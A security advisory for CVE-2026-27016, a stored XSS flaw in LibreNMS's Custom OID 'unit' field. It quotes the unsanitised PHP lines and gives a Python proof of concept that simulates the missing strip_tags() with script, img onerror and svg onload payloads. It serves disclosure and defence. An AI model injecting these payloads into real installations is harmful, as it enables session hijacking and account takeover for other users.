CVE-2026-27016

Description

### Summary The `unit` parameter in Custom OID functionality lacks `strip_tags()` sanitization while other fields (`name`, `oid`, `datatype`) are sanitized. The unsanitized value is stored in the database and rendered without HTML escaping, allowing Stored XSS. ### Details **Vulnerable Input Processing (`includes/html/forms/customoid.inc.php` lines 18-21):** ```php $name = strip_tags((string) $_POST['name']); // line 18 - SANITIZED $oid = strip_tags((string) $_POST['oid']); // line 19 - SANITIZED $datatype = strip_tags((string) $_POST['datatype']); // line 20 - SANITIZED $unit = $_POST['unit']; // line 21 - NOT SANITIZED! ``` **Vulnerable Output (`graphs/customoid.inc.php` lines 13-20):** ```php $customoid_unit = $customoid['customoid_unit']; // Retrieved from DB $customoid_current = \LibreNMS\Util\Number::formatSi(...) . $customoid_unit; echo "...$customoid_current..."; // ECHOED WITHOUT ESCAPING! ``` ### PoC ```python #!/usr/bin/env python3 """ XSS test for LibreNMS Custom OID - unit parameter """ import html as html_module import re def strip_tags(value): return re.sub(r'<[^>]*?>', '', str(value)) # Simulate form processing (customoid.inc.php lines 18-21) test_inputs = { 'name': '<script>alert(1)</script>Test OID', 'oid': '1.3.6.1.4.1.2021.10.1.3.1', 'datatype': 'GAUGE', 'unit': '<script>alert("XSS")</script>', } name = strip_tags(test_inputs['name']) # Sanitized oid = strip_tags(test_inputs['oid']) # Sanitized datatype = strip_tags(test_inputs['datatype']) # Sanitized unit = test_inputs['unit'] # NOT SANITIZED! print("Input Processing Analysis:") print(f" name (strip_tags): {name}") print(f" oid (strip_tags): {oid}") print(f" datatype (strip_tags): {datatype}") print(f" unit (NO strip_tags): {unit}") print() print("*** VULNERABILITY: 'unit' parameter has NO strip_tags()! ***") # Test XSS payloads payloads = [ '<script>alert("XSS")</script>', '<img src=x onerror=alert(1)>', '<svg onload=alert(1)>', ] print("\nXSS Payload Tests:") for payload in payloads: escaped = html_module.escape(payload) has_xss = '<script>' in payload or 'onerror=' in payload.lower() print(f" Payload: {payload}") print(f" Raw (vulnerable): Contains executable code: {has_xss}") print(f" Escaped (safe): {escaped}") ``` ### Expected Output ``` Input Processing Analysis: name (strip_tags): alert(1)Test OID oid (strip_tags): 1.3.6.1.4.1.2021.10.1.3.1 datatype (strip_tags): GAUGE unit (NO strip_tags): <script>alert("XSS")</script> *** VULNERABILITY: 'unit' parameter has NO strip_tags()! *** ``` ### Impact - **Attack Vector:** User with device edit permissions sets malicious Unit value - **Exploitation:** XSS payload stored in database, executes for all users viewing device graphs - **Consequences:** - Session hijacking via cookie theft - Admin account takeover - Malicious actions on behalf of victims - Persistent attack affecting all users - **Affected Users:** All LibreNMS installations with Custom OID feature

Description

How to fix CVE-2026-27016

Is CVE-2026-27016 being exploited?

Affected packages (1)

CVSS scores

References (6)